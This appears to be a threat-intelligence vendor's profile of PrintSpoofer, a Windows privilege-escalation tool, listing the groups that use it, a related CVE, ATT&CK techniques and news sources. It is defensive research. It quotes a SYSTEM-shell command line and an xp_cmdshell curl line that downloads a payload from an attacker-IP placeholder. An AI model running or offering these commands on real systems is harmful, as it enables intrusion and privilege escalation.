Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 2 actorsExploits 1 CVE

PrintSpoofer

PrintSpoofer is a Windows local privilege-escalation tool/exploit used to elevate execution to NT AUTHORITY\SYSTEM by abusing token impersonation when SeImpersonatePrivilege is available. The provided content explicitly describes it being used to leverage SeImpersonatePrivilege on Windows Server 2016 and to escalate from lower-privileged service contexts such as IIS application pool identities and NT AUTHORITY\Network Service to SYSTEM. It is referenced alongside other privilege-escalation tooling such as PrintNightmare.

Observed usage in the content is post-compromise rather than initial access. In one walkthrough, an attacker obtained code execution as iis apppool\defaultapppool, verified SeImpersonatePrivilege with whoami /priv, downloaded PrintSpoofer64.exe, and executed it with '-i -c cmd' to obtain a SYSTEM shell. In another exploit chain involving CVE-2024-26230 in the Windows Telephony Service, a malicious DLL yielded NT AUTHORITY\Network Service execution, after which PrintSpoofer was used to escalate further to NT AUTHORITY\SYSTEM because the service token had SeImpersonatePrivilege.

The content also ties PrintSpoofer to multiple threat activities. Palo Alto Networks Unit 42 reported CL-UNK-1068 using PrintSpoofer in intrusions targeting high-value organizations across South, Southeast, and East Asia, including aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors. In those intrusions, PrintSpoofer appeared among payloads executed via DLL side-loading with legitimate Python executables, alongside FRP and the custom Go-based scanner ScanPortPlus. Separate reporting in the content states Earth Longzhi, a subgroup of APT41, used PrintSpoofer during post-exploitation in campaigns from 2020 to 2022 targeting sectors including government, healthcare, infrastructure, banking, defense, aviation, insurance, and urban development across Taiwan and other Asia-Pacific countries.

High-confidence indicators and execution details directly mentioned in the content include the binary name PrintSpoofer64.exe and the command line 'PrintSpoofer64.exe -i -c cmd'.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2024-26230Windows Telephony Service (TapiSrv) Elevation of Privilege Use-After-Free

CVE-2024-26230 is a critical vulnerability found in the Windows Telephony Service (TapiSrv), which can lead to an elevation of privilege on affected systems. The exploit leverages a use-after-free in FreeDialogInstance.

via starlabs sgstarlabs.sg
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Earth Longzhi

During the investigation of the second campaign, we collected multiple hacking tools used for privilege escalation (PrintNightmare and PrintSpoofer)

via trend micro researchtrendmicro.com
CL-UNK-1068

“The attackers used this technique to load and execute several tools as payloads, including FRP, PrintSpoofer…”

via palo alto networks unit 42 blogunit42.paloaltonetworks.com
MITRE ATT&CK

Techniques & procedures

5 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

1 technique
T1574.001DLLEvidence1

“use of legitimate Python executables to launch DLL side-loading attacks… python.exe… alongside a malicious side-loaded DLL… python20.dll… loader reads… shellcode… executes… in memory.”

Privilege Escalation

3 techniques
T1068Exploitation for Privilege EscalationEvidence4

we collected multiple hacking tools used for privilege escalation (PrintNightmare and PrintSpoofer)

T1134Access Token ManipulationEvidence3

In this case, we can achieve higher privilege by using PrintSpoofer exploit to leverage to NT Authority/System.

T1548Abuse Elevation Control MechanismEvidence1

Local Windows winPEAS PowerUp Seatbelt Unquoted svc paths DLL hijack AlwaysInstallElevated JuicyPotato RoguePotato PrintSpoofer GodPotato UAC fodhelper/sdclt

Stealth

2 techniques
T1134Access Token ManipulationEvidence3

In this case, we can achieve higher privilege by using PrintSpoofer exploit to leverage to NT Authority/System.

T1574.001DLLEvidence1

“use of legitimate Python executables to launch DLL side-loading attacks… python.exe… alongside a malicious side-loaded DLL… python20.dll… loader reads… shellcode… executes… in memory.”

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

xp_cmdshell "curl http://<ATTACKER IP>/rev.exe -o C:\temp\rev.exe" ... After transfering PrintSpoofer64.exe over

ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
the hacker newsNews
Mar 9, 2026
Web Server Exploits and Mimikatz Used in Attacks Targeting Asian Critical Infrastructure

Windows privilege escalation tool commonly used post-compromise to obtain elevated privileges.

Read more
palo alto networks unit 42 blogNews
Mar 6, 2026
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors

Open-source Windows local privilege escalation tool abused to elevate privileges (also used alongside a custom .NET variant, PrintProgram).

Read more
infosec writeupsNews
Feb 18, 2026
TryHackMe Relevant Walkthrough: From Anonymous Share to SYSTEM | by Ram | Feb, 2026 | InfoSec Write-ups

Local privilege escalation tool that abuses SeImpersonatePrivilege (via named pipe/token impersonation) to spawn a process as SYSTEM on Windows (commonly used on Server 2016).

Read more
starlabs sgNews
Jan 24, 2025
CVE-2024-26230: Windows Telephony Service - It's Got Some Call-ing Issues (Elevation of Privilege) | STAR Labs

A Windows privilege escalation exploit/tool used to abuse SeImpersonate privilege to elevate from Network Service to SYSTEM.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping5

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.